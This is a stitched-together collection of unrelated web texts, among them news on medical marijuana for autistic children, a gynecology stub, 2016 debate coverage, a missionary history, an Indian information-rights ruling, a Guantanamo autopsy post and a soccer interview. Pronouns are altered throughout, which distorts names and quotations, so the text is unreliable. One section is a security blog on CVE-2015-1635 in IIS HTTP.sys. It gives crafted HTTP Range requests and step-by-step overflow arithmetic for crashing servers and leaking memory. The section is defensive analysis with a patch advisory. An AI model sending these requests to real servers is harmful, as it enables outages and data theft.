Sasso said Lehigh has not yet allocated money for the study and will seek grants if BioGreen is awarded a grower 's license . BioGreen is among 28 growers competing for a license in the Northeast region , which includes the Lehigh Valley . The region is expected to be awarded two grower/producer licenses under phase one of the medical marijuana program . The licenses will be awarded as early as Tuesday .
The use of medical marijuana with autistic children became a national conversation in 2009 after a Diane Sawyer interview with a California mother , Mieko Hester-Perez , who said marijuana brownies helped save their son 's life . Since then , stories have popped up across the country and parents have organized to share their experiences .
Among them is Erica Daniels , a Montgomery County mom . Them son Leo has enough focus to do things other 12-year-olds might find daunting — like assembling a 300-piece puzzle . But they can be sidetracked when anxiety associated with their autism spectrum disorder takes over . She 's tried giving them prescription medication , diet changes , herbs and a hyperbaric oxygen chamber — nothing has made much of an impact .
Until they tried cannabis . The first time they took it , Leo curled up with their mother to watch the entire film , `` Where the Wild Things Are , '' and was meltdown-free for a month at a time .
`` Since he 's been taking cannabis , it relieved that anxiety , '' Daniels said .
She 's among the 259 people who obtained a `` safe harbor '' to have marijuana for medical purposes until Pennsylvania 's industry takes root .
Pennsylvania is among a few of the 29 states with medical marijuana programs that specify autism as a qualifying condition that can be treated by the drug . Delaware allows it to be used for autism with self-injurious or aggressive behavior . Doctors in California , Oregon , Massachusetts and Washington , D.C. , can recommend marijuana based on the symptoms that make it a debilitating condition .
The Food and Drug Administration has not approved marijuana for medical use .
In fact , the federal government classifies marijuana as a Schedule 1 illegal substance — the same as heroin . The classification means that there is a high potential for abuse and there is no accepted medical value . It 's a higher classification than cocaine .
The American Medical Association in 2009 urged the government to review that classification so there could be more clinical research and the development of cannabinoid-based medicines .
The alternatives for parents like Daniels are not attractive . The Centers for Disease Control and Prevention estimates 1 in 68 children is on the autism spectrum , which can cause outbursts and other symptoms that pose safety risks — such as wandering and attraction to water .
The FDA has approved antipsychotic prescription drugs to help manage irritability associated with some forms of autism , but those drugs come with their own risks .
Marijuana contains a nonpsychoactive component , cannabidiol — CBD — that has shown promise in treating the disorder , but the problem is that it 's mostly anecdotal evidence .
THC is the main mind-altering chemical found in marijuana .
Sisley said oils that are very high in CBD with minimal amounts of THC should not have any psychoactive or intoxicating effects , but studies need to determine that .
Dr. A.J . Marsden , an assistant professor of human services and psychology at Beacon College in Florida , said there is little scientific evidence to suggest it is an effective treatment . Often , they said , the data cited by supporters are from animal-based research that has yet to be generalized to human subjects . The research on humans is a small number of case studies , they said .
`` This is not to say that we should give up , but we also must realize that none of the current scientific literature provides sufficient , high-quality evidence to suggest that medical marijuana should be recommended for treatment of ASD at this time , '' said Marsden , who is preparing pitches for research in Florida . `` We need more research focusing on the effectiveness as well as the potential long-term effects . ''
`` Duplicate vagina '' redirects here . For the two lateral vaginas which are normally present in female marsupials , see Marsupial female reproductive system
Vaginal septum Specialty Gynecology
A vaginal septum is a vaginal anomaly that is partition within the vagina ; such a septum could be either longitudinal or transverse . In some affected women , the septum is partial or does not extend the length or width of the vagina . [ 1 ] Pain during intercourse can be a symptom . A longitudinal vaginal septum develops during embryogenesis when there is an incomplete fusion of the lower parts of the two Müllerian ducts . As a result , there may appear to be two openings to the vagina . There may be associated duplications of the more cranial parts of the Müllerian derivatives , a double cervix , and either a uterine septum or uterus didelphys ( double uterus ) . [ 1 ] [ 2 ] A transverse septum forms during embryogenesis when the Müllerian ducts do not fuse to the urogenital sinus . A complete transverse septum can occur across the vagina at different levels . Menstrual flow can be blocked . [ 3 ] and is a cause of primary amenorrhea . The accumulation of menstrual debris behind the septum is termed cryptomenorrhea . Some transverse septa are incomplete and may lead to dyspareunia or obstruction in labour . [ 4 ] [ 5 ]
See also [ edit ]
References [ edit ]
Media related to Vaginas at Wikimedia Commons
WASHINGTON ― Donald Trump insisted in the second presidential debate Sunday night that a tape of them bragging about sexually assaulting women in 2005 was nothing but “ locker room talk ” and does n't represent their attitude toward women . Hillary Clinton responded that the man standing on the stage is every bit the same man who said they could “ grab ” women “ by the pussy ” 11 years ago .
“ What we all saw and heard on Friday was Donald talking about women , what they think about women , what they do to women , ” Clinton said . “ And they have said that the video does n't represent who they are , but I think it 's clear to anyone who heard it that it represents exactly who they are , because we 've seen this throughout the campaign . ”
“ We have seen them insult women , ” Clinton continued . “ We 've seen them rate women on their appearance , rank them from one to 10 . We 've seen them embarrass women on TV and on Twitter . We saw them after the first debate spend nearly a week denigrating a former Miss Universe in the harshest , most personal terms . So yes , this is who Donald Trump is . ”
The crass recording , obtained by The Washington Post , shows Trump on a bus with “ Access Hollywood ” host Billy Bush talking about how they can freely grope and hit on married women because he 's a celebrity .
“ I just start kissing them , ” Trump says on the tape . “ It 's like a magnet . Just kiss . I do n't even wait . And when you 're a star , they let you do it . You can do anything . ... Grab them by the pussy . ”
Debate moderator Anderson Cooper asked Trump if they understood that what they were talking about was sexual assault , and the GOP nominee said “ no . ”
“ This was locker room talk , ” Trump said . “ I apologize to my family and to the American people . Certainly I 'm not proud of it . This is locker room talk , and when you have a world where ISIS is chopping off heads , drowning people in steel cages ... ”
Trump then went off on a tangent about ISIS . “ I will tell you I will take care of ISIS and get on to much more important and bigger things , ” they said .
“ I have great respect for women , ” Trump said at one point . “ Nobody has more . ”
Clinton said she 's “ spent a lot of time thinking about ” Trump 's comments in the leaked video in the past 48 hours , and it 's clear to them that the New York business mogul is unfit to be president .
“ It 's not only this video that raises questions about their fitness to be our president , ” they said . “ Because they have also targeted immigrants , African-Americans , Latinos , people with disabilities , prisoners of war , Muslims , and so many others . So this is who Donald Trump is , and the question for us , the question our country must answer , is if this is not who we are . ”
The Tuesday Podcast : Lighthouses , Autopsies And The Federal Budget
toggle caption Storm Crypt/Flickr
The Tuesday Podcast : Lighthouses , Autopsies And The Federal Budget Listen
What should the government pay for ?
On today 's Planet Money , we pose that question to Charlie Wheelan , author of the book Naked Economics , and recent Congressional candidate ( he lost ; here 's their underwater ad ) .
They give us the econ 101 answers : The government should definitely pay for something if it 's a public good , which Charlie defines as ...
something that we all need that will make our lives better , but the market will not and can not provide
The textbook example is a lighthouse . Why should any given sea captain pay for a lighthouse ? As Wheelan says , if somebody refuses to pay , we ca n't say , `` Close your eyes when you sail past this rocky point . ''
Other examples of public goods include national defense and autopsies . Everyone benefits from the medical knowledge autopsies provide , but it 's not really in any individual 's interest to pay for an autopsy .
Somehow , this fact leads us to call 1-800-AUTOPSY .
* * *
Today 's Planet Money indicator is 8 percent . That 's the decline in the value of the dollar since late August , when Fed officials started talking about the latest round of quantitative easing .
The falling dollar is playing a role in the global currency war -- the effort by countries around the world to boost exports by lowering the value of their currencies .
For more , here 's a sample of our coverage of QE and the currency war :
Subscribe to the podcast . Music : Jenny And Johnny 's `` Scissor Runner . '' Find us : Twitter/ Facebook/ Flickr .
The Rev . Samuel Marsden .
There is little doubt that of all the early missionaries Samuel Marsden is the best remembered . It was their investigations that first showed that the Maori attacks on ships and their crews were usually the result of previous assaults by the seamen on the natives . It was in December , 1814 , that Marsden first visited New Zealand . It is a striking commentary on the state of the country at the time , that before leaving Sydney they wrote to the Rev . J. Pratt , Secretary of the Church Missionary Society : “ I leave my family under Divine protection . If I should be spared to return to them I shall be able to provide for all their wants ; but if Providence should otherwise determine , I recommend them to the kind consideration of the Society . ”
Marsden was accompanied on their voyage in the brig Active by several Maori chiefs , returning from Sydney , as well as Thomas Kendall , who had been appointed magistrate to remain in the country . This appointment was made on Marsden 's recommendation , with a view to effecting some control over the licentiousness of the whalers and seamen visiting New Zealand . Three of the chiefs — Dewaterra , Shunger and Kora Korra—were named in Governor Macquarie 's order of November 9th , 1814 , as being invested with somewhat similar powers . Incidentally , Marsden uses a slightly different spelling for their names than that quoted in the official order .
On their return to Sydney , Marsden presented to the Church Missionary Society a very lengthy account of their observations . It is characteristic of the age in which they lived that this report opens with much preliminary statement , including even a reference to American Independence . They then proceeds to an historical account of the first missionary contacts with New Zealand , including an account of the visit of various chiefs to Norfolk Island .
On their first voyage Marsden arrived at the North Cape on December 16th , 1814 , and left Whangaroa for Sydney in the following February . As was always the case with Marsden , they suffered acutely from sea sickness throughout the voyage . A day was spent off North Cape and whilst the chiefs went ashore many canoes brought out an abundance of fish such as Marsden considered “ the finest fish I ever saw . ”
Boyd and the massacre of the crew in 1809 . This happening was investigated by Marsden , who concluded that it was the result of the ill-treatment ( Print , courtesy Alexander Turnbull Library . )
Marsden 's Mission-boat escorted by Maori War Canoes in the Bay of Islands . Whilst at Whangaroa Marsden attempted the difficult task of making peace with the chiefs of the district . In this they were considerably helped by both Duaterra and Shungee , two of the chiefs with him . Whangaroa was the scene of the destruction of theand the massacre of the crew in 1809 . This happening was investigated by Marsden , who concluded that it was the result of the ill-treatmentof the Maoris by the crew in the first place .
Marsden 's decision to sleep with the natives at night was a bold one in view of the fact that at the time they were not yet sure of their intentions and did not know whether they would make peace . There is little doubt that their action must have hastened the reconciliation that took place the next day . In their report Marsden says that they did not sleep much and describes the scene on a beautiful starlit night in these words : -
“ Around us were numerous spears struck upright in the ground , and groups of natives lying in all directions , like a flock of sheep upon the grass , as there were neither tents nor huts to cover them . I viewed our situation with new sensations and feelings that I can not express—surrounded by cannibals who had massacred and devoured our countrymen . ”
page 35 ( Rly . Publicity photo . )
Historic Whangaroa Harbour , North Auckland . On Christmas Day , 1814 , was enacted a scene that had a significance for New Zealand little realised at the time by those taking part in it . Marsden preached the first public service held in the Dominion , taking as their text , “ Behold I bring you tidings of greatjoy. ” Prior to the service a special area , including even a pulpit and a reading desk , had been prepared under the direction of Duaterra . This chief apparently acted as master of ceremonies , being dressed for the occasion in a regimental uniform given them by Governor Macquarie . With their sword in one hand , they used a switch in the other to indicate when those assembled were to stand up and when to sit down . Later they explained the sermon in Maori .
Marsden was mainly desirous of providing for the settlement of those that were to remain behind , but they yet found time to visit a number of other districts . They penetrated where previously no white man had been . Their report is full of interesting comments on the customs of the country . They concluded that although all the natives were cannibals it was not due to hunger , but solely as a method of showing “ their retaliation and revenge for injuries sustained. ” They also tried to convince the natives that their punishment of death for theft was too severe . It was their custom to hang thieves . On one occasion Marsden lost three small articles and had it not been for their intervention the culprit would have been killed outright by their chief .
Prior to leaving the country Marsden desired to secure some sort of legal title to the land on which their Missionary settlement was to stand . This area they estimated to comprise some 200 acres and on February 24th , 1815 , a formal deed was drawn up and signed . The price paid was twelve axes . It was signed by a chief styled “ Ahoodee O Gunna , King of Ranghee Hoo ” with a signature that “ contains all the lines which are tatooed on the chief 's face , according to their singular and curious mode of making thereon drawings and figures . ”
Marsden did not again visit the colony for four years , but they had succeeded in establishing Kendall in residence and arranging for a fairly regular means of communication with Sydney . Considering the short time they spent in the country they accomplished much .
The Central Information Commission , in the case of Balendra Kumar vs Ministry of Labour and Employment , held that when information is being sought by the applicant , non-traceability of the file can not be used as an excuse to deny the information sought .
The complainant had sought details regarding certain specified files ; however , the same was denied to them by the CIPO , on account of the file being missing . It was the claim of the respondent authorities that the file could not be traced despite their best efforts .
The Commission , relying on the case of Omprakash v GNCTD , noted that no public authority can deny the right of the applicant to the information sought . A file being non-traceable is a reflection of the inefficient and pathetic management of files by the public authority . If despite the best efforts the file can not be traced , then efforts should be made to reconstruct the file and provide information .
Further , the Commission also noted that filing of an FIR does n't relieve the public authority of its duty to provide information . The Police do not have the duty to trace missing files and will come into the picture only when there has been a theft of the file ( s ) in question .
The Commission also noted that those documents which are no longer to be used by the public authority , but are of a permanent nature , are to be shifted to the national or state archives for safekeeping . Loss of records of a permanent nature would invite penal sanctions under Section 201 of the Indian Penal Code . Further , if these files are a part of the public record and form evidence in any case , their destruction would be seen as a destruction of evidence and will invite sanctions under the Public Records Act and the Right to Information Act .
Appropriate action in case of a missing file would be recovering the file , finding out which employee was responsible for the file being missing , taking suitable disciplinary actions against that employee and addressing the problems which arose due to the file being missing . If despite these efforts the file could not be traced , then the public authority has a moral and legal duty to sincerely address the grievance of the applicant . No such actions were undertaken by the public authority .
The Commission , having the power to direct disclosure of information provided , has the jurisdiction to direct enquiry against the PIO/CPIO claiming that the information sought by the applicant is not traceable .
Read the Order here .
RELEASE : Some time between 3 a.m. and 8 a.m. EST on August 21 , 2017 Facebook removed almost every active account on God Emperor Trump .
They also removed every active account on the Facebook page Memelord For Hire , actively shutting us out of that page .
We also lost admin privileges on our backup pages , God Emperor Trump II : The Emperor Strikes Back , and God Emperor Trump 's Inquisition .
There is one admin left on God Emperor Trump . They prefer to stay anonymous for various reasons , but should Facebook delete their account – which uses their real identity , and has been confirmed to Facebook over a year ago by sending an image of their driver 's license to Facbeook – then God Emperor Trump the Facebook page will cease to function .
This is the most flagrant attack Facebook has launched . It removed real accounts , with people 's real names , addresses , phone numbers , and photographs simply because they ran conservative Facebook pages .
We are at a loss as toward our next step . We have created a profitable business , Department of Memes , using these pages . We reach between 3-5 million people per week on Facebook , driving revenue to Facebook in the process . We painstakingly make sure not to violate any of Facebook 's terms and conditions .
In fact , none of our content was even removed . They left every video , picture , link , and text-post we ever made to all of our pages . They simply purged our accounts .
We are not Nazis , we are not ethno-nationalists . We are regular , every day Trump supporters . If we were , we would be the most ethnically and ideologically diverse group of Nazis to ever walk the earth .
In our view , this is an obvious , calculated attack against conservative Facebook users and conservative Facebook pages .
If you would like to contact us , please email the primary admin at anonsonn @ gmail.com .
Thank you for enjoying our page . We have been in operation since December of 2015 , and so long as Facebook allows us to remain , we look forward to many more years to come .
Comments
comments
One of the vulnerabilities recently patched by Microsoft can be exploited in the same way as Heartbleed , and needs to be addressed immediately .
Addressed in the April batch of Patch Tuesday fixes ( in Microsoft Security Bulletin MS15-034 , specifically ) , the Microsoft Windows HTTP.sys Integer Overflow vulnerability , or CVE-2015-1635 , is a remote code execution vulnerability that exists in HTTP.sys , or the HTTP protocol processing module in Microsoft Internet Information Service . Integer overflows have long been known as one kind of notorious and fairly old vulnerability – so why the sudden interest ? I found that the vulnerability can be easily used for denial of service ( DoS ) attacks or data leaks similar to last year 's Heartbleed attack , in which information is copied from memory and sent to the client .
A researcher already published a checker script for this vulnerability on Pastebin and showed how it can be used to carry out DoS attacks or to leak information . Additionally , another researcher published a POC for information leaks .
Detailed analysis of DoS attacks and Information leak attacks via CVE-2015-1635
In this blog post I will explain in detail how the vulnerability can be used for DoS attacks and data leak attacks . Before I dive into the vulnerability , let 's introduce some background information .
Figure 1 . Architecture of IIS
After installing IIS ( Internet Information Service ) on the system , there is a service named the World Wide Web Publishing Service , which I call the WWW service . When a client sends an HTTP request to the system , the WWW service starts up or selects a worker process ( W3wp.exe ) based on load balancing policy to process the HTTP request and send the appropriate HTTP response . The file W3wp.exe uses HTTP.sys to do many tasks related to HTTP protocol handling , which include HTTP protocol parsing , response content assembling , and content caching . HTTP.sys receives the HTTP request and sends the HTTP response via TCPIP.sys .
How can this be used in DoS attacks ?
Let 's prepare a HTTP request to start our DoS journey . The testing environment I used was Windows 8.1 ( 32-bit version ) plus IIS 8.5 .
First , we take the IIS ‘ s default web page iisstart.htm ( file size 694 bytes ) as an example . We compose a HTTP request as follows :
GET /iisstart.htm HTTP/1.1\r
Host : aaaaa\r
Range : bytes=284-18446744073709551615 \r
\r
The HTTP range request start position is 284 , and the end position is 18446744073709551615 . The hexadecimal value of 18446744073709551615 is 0xFFFFFFFFFFFFFFFF . The range length is huge—it must be over the size of the requested web page file , which appears suspicious . I will explain later why I selected the start position as 284 .
After the request is sent to HTTP Server , one w3wp.exe handles the HTTP request processing . TCPIP.sys forwards any HTTP protocol content to HTTP.sys . If the request is a HTTP range request , it will call the function UlpParseRange ( ) . The function parses the request to get the requested range 's start position and end position and calculates the range 's length . We can see that the first integer overflow happens in code which calculates the range 's length . The code is as follows :
Figure 2 . Range Length code
When the end position=0xFFFFFFFFFFFFFFFF and start position=0 , the integer overflow happens and the Range Length equals 0 . The code does not check whether there is an overflow and does not take the error handling action .
In our case , the integer overflow does not happen . The end position=0xFFFFFFFFFFFFFFFF and start position=284 , while Range Length equals -284 , whose hexadecimal value is 0xFFFFFFFFFFFFFEE4 . If this is interpreted as an unsigned integer , the value is very huge .
After finishing parsing the HTTP request , it will call the function UlAdjustRangesToContentSize ( ) . The function adjusts the Range 's start position and length if the start position and length is “ invalid ” . The definition of “ invalid ” contains several scenarios which indicate the Range is over the requested web page content . Examples include :
Range Start Position is 0xFFFFFFFFFFFFFFFF
Range Length is 0xFFFFFFFFFFFFFFFF
Start Position > = the requested web page length
End Position > = the requested web page length
The second integer overflow can be found in the last function . It uses the following code to get the Range End Position :
Figure 3 . Adjustment action
In this case , the Range Start Position equals 284 , Range Length equals 0xFFFFFFFFFFFFFEE4 , so an overflow happens , Range End Position equals 0 and the adjusted action is bypass .
If one same request is received continuously , the request ‘ s response will be cached and will be taken from the cache and sent to the requester . It will call the function UxpTpDirectTransmit ( ) .One job of the function is to calculate the HTTP response packet length . The simplified code is as follows :
Figure 4 . Simplified HTTP code
Using our case ‘ s value :
Range Count = 1 ;
Range Boundary and Range Info length = 0 ; // ( This will be explained later . )
Range Tail Boundary Length = 0 ; // ( This will be explained later . )
Range Length = 0xFFFFFEE4 ; // ( The value is already cast to 32 bit )
HTTP Head Length = 283 ;
The HTTP Response Length ‘ s result is 0xFFFFFFFF . The whole length is 4G . Systems will consider that this HTTP response total size is 4G . This means that there is a HTTP response packet whose calculated size is larger than the real size . This is why we used 284 as the Range Start Position .
HTTP Response Length = HTTP Head Length + ( Range End Position – Range Start Position + 1 )
= HTTP Head Length + ( 0xFFFFFFFF – Range Start Position + 1
= HTTP Head Length - Range Start Position
If Range Start Position less than < = HTTP Head Length , it will trigger an overflow . The HTTP Response Length value range is [ 0 , HTTP Head Length ) .
Because we want to launch a DoS attack , this is not the result we want . We want the HTTP Content Length value to be large . The preferred range for Range Start Position is [ HTTP Head Length+1 , target page size ) . In this range , it does NOT trigger an overflow and the HTTP Content Length value will become large , and will then allow a DoS attack .
After the HTTP response package is assembled , HTTP.sys will forward the packet information to the protocol stack driver to send it . TCPIP.sys ‘ s function TcpSegmentTcbSend ( ) will traverse every part content of the packet . There is integer overflow in the function . Here is a list of some simplified code :
Figure 5 . Simplified code
In the above code , line 15 will trigger the overflow . In our case , the HTTP Response Length is 0xFFFFFFFF . The “ virtual address ' ” initial value must be a kernel address ( > =0x80000000 ) . Because HTTP Response Length is very large , the loop will run many times . When the loop has run many times , the “ virtual address ” will become a very small value after triggering the integer overflow . In the loop , it will use the “ virtual address ” to build a partial memory descriptor list ( MDL ) . Because the range is not a sub range in the source range , it leads to a Blue Screen Of Death ( or BSOD ) . The DoS attack is complete .
How can this be used in an information theft attack ?
We prepare a request as follows :
GET /iisstart.htm HTTP/1.1\r
Host : aaaaa\r
Range : bytes=3-18446744073709551615 , 1-600 '' + `` \r
\r
``
The reason for using multiple ranges will be explained later . We take 3-18446744073709551615 as Range1 and take 1-600 as Range2 .
In function UlpParseRange ( ) , the code can be seen in Figure 3 . For this case , we have 2 range lengths :
Range1 Length = 0xFFFFFFFFFFFFFFFF - 0x3 + 1 = 0xFFFFFFFFFFFFFFFD
Range2 Length = 600 -1 + 1 = 600
After parsing the HTTP request , it will call the function UlAdjustRangesToContentSize ( ) . The code is in Figure 3 . Range1 will trigger integer overflow ( 3 + 0xFFFFFFFFFFFFFFFD = > 0 ) , so bypass adjust action , even if the Range1 Length is invalid . Range2 is valid , so it should not be adjusted .
If the same request is received continuously , the request ‘ s response will be cached and will be taken from the cache and sent to the requester . It will call the function UxpTpDirectTransmit ( ) . The code in Figure 4 is executed , using the following values :
Range Count = 2
Range1 Length = 0xFFFFFFFFFFFFFFFD
Range2 Length = 600
Http Head Length= 0x127 //HTTP head content , see Figure 6
Range1 Boundary and Range1 Info length = 0x7a
Range2 Boundary and Range2 Info length = 0x69
Range Tail Boundary Length = 0x32 ; //see Figure 8
By using a multi-range request , there is a Range bound tag and Range Information ( Content-Type , Content-Range ) before each range content . ( See Figure 7 for this . )
Figure 6 . HTTP Head
Figure 7 . Range boundary tag and Range Information
Figure 8 . Range Tail
From Figure 4 , we can see that HTTP Response Length = HTTP Head Length + Range Boundary and Range Info length + Range1 Length + Range Boundary and Range Info length + Range2 Length = 0x127+7a+0xFFFFFFFD+0x69+0x258+0x32 = > 0x491 . At line 5 of Figure 4 , an integer overflow occurs when 0xFFFFFFFD is added . At this time , the system takes 0x491 as the HTTP response length .
The memory status can be described as following :
Figure 9 . Memory status
After assembling the HTTP response package , HTTP.sys will forward the packet information under the protocol stack driver to send it . TCPIP.sys ‘ s function TcpSegmentTcbSend ( ) will traverse every part content of the packet ( see Figure )
See the code in Figure 4 . In this case , the HTTP response length is 0x491 . When handling the part which length is 0xFFFFFFFD , line 7 's condition is met , Part Length ‘ s value will be set by Remain Length . At that point , Remain Length is 0x2f0 ( 0x491 – 0x172- 0x7a ) . It will use [ 0x3 , 0x3+0x2f0 ] as a buffer range to read and send to client . Our target web page iistart.html has a length 0x2b6 . The status is the following :
Figure 10 . Buffer status
In Figure 10 , the red part is the leaked information buffer . Compared with the code in Figure 5 , the condition at line 24 is satisfied and breaks the loop . That is to say , the parts after the part which has 0xFFFFFFFD length will not be sent to client . At this point , we can see why we used a multi-range request .
Using multi-range requests can let the HTTP response length ( calculated in step 3 ) become larger to leak more information . If only a single range is used , the HTTP response length becomes either too big or too small . If the HTTP response length is too big , it will lead to BSOD , as it was described in the previous section . If the HTTP response length is small , it does n't make a range to cover the buffer after the target web page content to do information leak . Attackers use many range to leak more information . For example , I created a multi-range request as follows :
GET /iisstart.htm HTTP/1.1\r
Host : aaaaa\r
Range : bytes=3- 18446744073709551615,1-32,32-64 , 64-96,96-128,128-256 , 129-130,130-140,160-170,180-190 , 190-200 '' + `` \r
\r
``
In the request , I use 11 ranges . The leaked information can be seen in the following picture :
Figure 11 . Information leakage
Given these attack scenarios , I strongly advise users and network administrators to apply the patch , if they have n't . Aside from the update provided by Microsoft , Deep Security also protects users from this through the following Deep Security rule :
1006620 – Microsoft Windows HTTP.sys Remote Code Execution Vulnerability ( CVE-2015-1635 )
This blog post is a follow-up to our previous blog entry on CVE-2015-1635 :
IIS At Risk : The HTTP Protocol Stack Vulnerability
I have n't been posting on this potentially game-changing story because the details are complex and the information overload enormous and I want to make sure I get every iota right . Stay tuned for more in the coming days . But Scott Horton 's latest piece zeroes in on a very specific detail : the weird autopsies . Horton claimed that the families of the dead prisoners requested the missing necks and heart and kidneys of the deceased for a second autopsy . Rowan Scarborough at Human Events , contacted the military to debunk the story . They wrote :
I am told authoritatively that the families have not requested the neck organs .
Horton has the actual letter requesting the organs ( see after the jump ) . So either it got lost in the mail or this is another demonstrable untruth from the government . Now Horton has asked one of the most respected autopsy pathologists inn the country to review the procedures of the autopsies as performed at Gitmo . Read the whole disturbing thing . It seems extremely clear that they violated standards and procedures that are routine for both civilian and military autopsies . For example , organs removed from bodies are always returned to the next of kin for secondary autopsies if requested . That did n't happen . From the pathologist , Dr Michael Baden :
It is not appropriate to be unresponsive to the pathologists conducting the second autopsy . If the body parts that were removed have been properly preserved , they can still be examined years later to assist in independently establishing how the death occurred .
Then this jumped out at me when I first read it . In the original autopsy , it was found that the hyoid bone of one of the deceased had been broken . The military claims this occurred accidentally during the removal of the neck for examination . It had nothing to do with what they claim were hangings . Here 's what the pathologist said of that finding :
A fracture of the hyoid bone occurs more commonly in homicidal manual strangulation than in suicidal hanging . A pathologist performing the second autopsy should be able to examine the hyoid bone and larynx to independently determine if the fracture happened while the decedent was alive or inadvertently after death during autopsy removal of the larynx .
My italics . But the second autopsy was denied this option by the US military . Then the weird detail that also struck me before : why on earth did the deceased stuff rags down their throats if they wanted to commit suicide by hanging ? The military 's explanation was that a rag was placed over the mouth to muffle any sound or cry they might utter when hanging and that they were then `` inhaled as a natural reaction to death by asphyxiation. ” No , I 'm not making that up . But I 'm not an expert so the pathologist 's analysis should be deferred to :
I am not aware of any other case in which suicide was accomplished in this way , at least not with a gag in their mouth covered by a surgical mask .
I have a feeling this story is not over .
The letter asking for the organs of the deceased is below :
We want to hear what you think about this article . Submit a letter to the editor or write to letters @ theatlantic.com .
The two colorways of Sk8 Hi OG 's have also been reported on at some length . From the looks of it , the black pair seems to have some hints of navy in the dye , as can be seen in closeups . The croc print really sets these apart and stand out mostly on the gray colorway . All black midsoles finish these off .
The WTAPS x Vans Vault Collection will release tomorrow , Tuesday , September 8th at Vault accounts worldwide . Being that this is a Vault release , not all accounts will release on the same day and you would do well to check our Vault Locator tab and ask your local which day they will put their stock on the floor . Also , even though there are 8 pairs in this collection , these are WTAPS so we do n't expect them to sit for very long . If you are on the fence , it may behoove you to just purchase them for retail rather than pay resale prices later .
Photos via Hypebeast .
This post was co-authored by Abigail Finkelman , Program Assistant in the Justice Program at the Brennan Center for Justice at NYU School of Law .
The events unfolding in Missouri have brought all eyes on the issue of law enforcement practices . Racial disparities in our justice system abound . But there is also a subtler dynamic at work : how the government spends money and the very real and human consequences of those decisions .
The bullets fired at Michael Brown , the tear gas thrown at the protesters , and the armored trucks designed for war driving through the streets of Ferguson did not appear out of nowhere . They were purchased .
A complex web of federal crime-fighting grants funnels tens of billions of dollars to states and cities . Most of these programs were created in the 1990s during the height of the War on Drugs . Their explicit aim : to encourage states to increase arrests , prosecutions and incarceration , all in the belief that harsher punishment would better control crime .
Two decades later , ample research shows this belief was mistaken . And now we lock up more people than any other country in the world . One in three Americans have criminal records . One in three black men can expect to spend time behind bars .
Yet these federal grants are often still on autopilot , incentivizing old guard practices that we know now have little public safety value and massive human consequences . The Pentagon-to-police equipment transfer program at the center of the Ferguson controversy , for example , was created in the early 1990s to increase police ability to fight drug gangs . Similarly , the Homeland Security Grant Program , which gives local police money to purchase military equipment , is flush with over $ 1 billion . All states receive a minimum amount , ranging from .08 percent to .35 percent of the total funds , regardless of how they spend the money .
But the breadth of federal grants extends far beyond military equipment . Federal dollars flow to all types of criminal justice purposes . For instance , the Edward J. Byrne Memorial Justice Assistance Grant , also created during the War on Drugs , largely subsidizes equipment for local police . The program inadvertently creates incentives to increase arrests , prosecutions and mass incarceration .
To be sure , many federal grants pay for important law enforcement programs that help control crime . The question is not whether police should have more money or less money , but rather what they do with that money . Washington should not be in the business of giving out money without knowing where it 's going or without condoning its ultimate use .
It 's not just peaceniks and liberal hipsters demanding reform . Staunch conservatives -- including the Koch Brothers -- also want crime control policies that reduce unnecessary intrusion . As Rand Paul noted , `` Washington has incentivized the militarization of local police precincts by using federal dollars to help municipal governments build what are essentially small armies . '' Instead , those dollars should incentivize reducing serious and violent crime and reducing unnecessary incarceration and arrests . This week , President Obama agreed with Paul , stating , `` I think it 's probably useful for us to review how the funding has gone , how local law enforcement has used grant dollars to make sure what they 're purchasing is stuff they actually need . ''
There is a relatively easy way the President can breathe life into this recommendation . It 's called Success-Oriented Funding . It 's practical , effective , and has bipartisan support . Success-Oriented Funding ties government dollars as closely as possible to clear outcomes and provide incentives to ensure those outcomes are achieved . Law enforcement grants , for example , should be tied to specific goals that reduce violence , ensure fair and appropriate justice , and keep communities safe . The question should be asked : When money is spent purchasing more bullets or more guns , is it going to further these goals ? Or is it missing the point ?
The President should issue an executive order to review all federal grants -- and other programs distributing government resources - for criminal justice purposes . Where these grants encourage harmful practices or where the goals are unclear , the President should direct federal agencies to recast them in a Success-Oriented Funding model .
The President has authority to reform these grants . An act of Congress -- which may never come -- is not needed . Federal agencies have discretion to implement this model into the grants they administer . In some cases , they may not be able to outright condition funding on meeting specific targets , but they can `` nudge '' recipients by sending clear signals on how administering agencies want the recipients to use the money .
CARSON , Calif. -- Dominic Kinnear 's second season back in charge of the San Jose Earthquakes started nicely , with victories over Colorado and Portland in the first two outings , then spiraled as goals stopped coming .
... if we 're winning more games , things like this do n't happen .
The Earthquakes limped to ninth place in the Western Conference with just 32 goals . That performance cost club legend John Doyle their job as general manager and amplified the pressure on Kinnear , winner of two MLS Cups in San Jose as an assistant coach and two as head coach at Houston , to turn things around pronto .
FourFourTwo caught up with the San Jose boss on the first day of the MLS Combine at StubHub Center .
FourFourTwo : The Earthquakes have just brought in former AS Roma exec Jesse Fioranelli as general manager , succeeding John Doyle , one of your closest friends . Initial impressions ?
Dominic Kinnear : We 've spoken a couple of times . Obviously , it 's the very first conversations , and they 've been good . They want to come to MLS and the San Jose Earthquakes . Their resume speaks very well of what he 's done in the past , and , hopefully , we can lean on them and their international experience to help our roster become better .
John and I worked over the years in many capacities , and they always will be a dear friend . Like I said before , if we 're winning more games , things like this do n't happen .
FFT : That 's the aim . Win more games , score more goals . It seems you 're reconstructing the team , building your own team , yes ?
Steve Davis Make 2017 the year we start owning America 's soccer culture
DK : In some positions , yes . We have n't really made too many moves in the midfield -- I think the middle of midfield is a strong part for us , the goalkeeper position as well -- and we 're on the verge of a couple other signings , a couple of guys who are returning who were out of contract coming up pretty soon . Were working really well with [ interim general manager ] Chris Leitch , as far as trying to build a roster up . There are some things , hopefully , we can get going in the next week or so that we think are going help our team going forward .
Because that was our problem last year : scoring goals . I 'm not going to hide from the fact . Defensively , we were strong , we were involved in a lot of games -- only [ six times ] during the whole year did we lose by two goals . So it just shows that we were there , but scoring goals was the big piece for us that really let us down .
FFT : What do you need to accomplish in the next few weeks , before camp opens ?
DK : Well , getting a couple forwards is good . That 's really it . We just announced Harold Cummings as a center back , so that helps . Last year with Victor [ Bernardez ] and Clarence [ Goodson ] and even Marvell [ Wynne ] a little bit and Andres [ Imperiale ] , they were all guys that were in their late 20s or 30s . And I think getting Harold gives us a little bit of youth and athleticism that 's going to help us as we go forward .
I think [ acquiring ] a wide midfielder that can play inside and a couple forwards will be helping . Because when you look at the season coming up here , Chris Wondolowski has been called into another [ U.S. national team ] camp , and we all hope they do great , but if he 's missing , then our forward line is already thin at the moment . It could be a little bit thinner .
FFT : Why did n't things click offensively last year ? Why were you not able to bring in the right guys ?
If you do n't have pressure to make the playoffs , then you 're just walking through the season ...
